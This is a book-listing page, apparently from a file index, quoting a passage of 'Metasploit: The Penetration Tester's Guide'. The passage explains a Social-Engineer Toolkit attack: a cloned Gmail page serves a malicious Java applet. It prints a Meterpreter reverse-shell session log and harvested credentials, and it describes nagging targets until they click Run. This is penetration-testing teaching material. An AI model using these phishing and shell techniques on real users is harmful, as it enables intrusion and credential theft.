Metasploit: The Penetration Tester's Guide by David Kennedy & Jim O'Gorman & Devon Kearns & Mati Aharoni

Author:David Kennedy & Jim O'Gorman & Devon Kearns & Mati Aharoni
Language: eng
Format: azw3, mobi, epub
Tags: COMPUTERS / Internet / Security
ISBN: 9781593274023
Publisher: No Starch Press
Published: 2011-07-15T00:00:00+00:00

Figure 10-6. Multi-attack security warning

We have a backup attack, however. The target clicks Run on the malicious Java applet, a Meterpreter shell begins, and the target is redirected back to the original Gmail page. The attack is successful.

Notice that when using the Java applet, we automatically migrate to a separate thread (process) that happens to be notepad.exe. Because of this, if the target closes the browser, our attack will continue because the process won’t terminate our Meterpreter shell. Also, within the configuration file you can set the “Java Repeater” option, which will continue to prompt the target with the Java applet warning even if he clicks Cancel. This makes it more likely that the target will click the Run button.

The Meterpreter shell is presented to us once a successful exploit is performed, as shown below.

[*] Sending stage (748544 bytes) to 172.16.32.131 [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 −0400 2010 [*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f' [*] Current server process: java.exe (824) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 3044 [*] New server process: notepad.exe (3044) msf exploit(ms09_002_memory_corruption) >

Now let’s say that this attack fails, and the target clicks Cancel (without the repeater option enabled). He would then be prompted to enter his username and password into the username and password fields, allowing you to successfully harvest the credentials on the website and still have a successful attack. While you wouldn’t have a Meterpreter shell, because the target didn’t click Run, you would still be able to intercept the credentials:

[*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

As you’ve seen in the preceding examples, you can see that SET offers a number of powerful web-based attack vectors in its arsenal. It can be difficult to persuade a target to think that a cloned site is legitimate. Most knowledgeable users are generally cautious about unfamiliar sites and try to avoid potential security issues as they browse the Internet. SET tries to leverage this cautiousness and, by letting you mimic a known website, fool even some of the savviest technical folks.

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.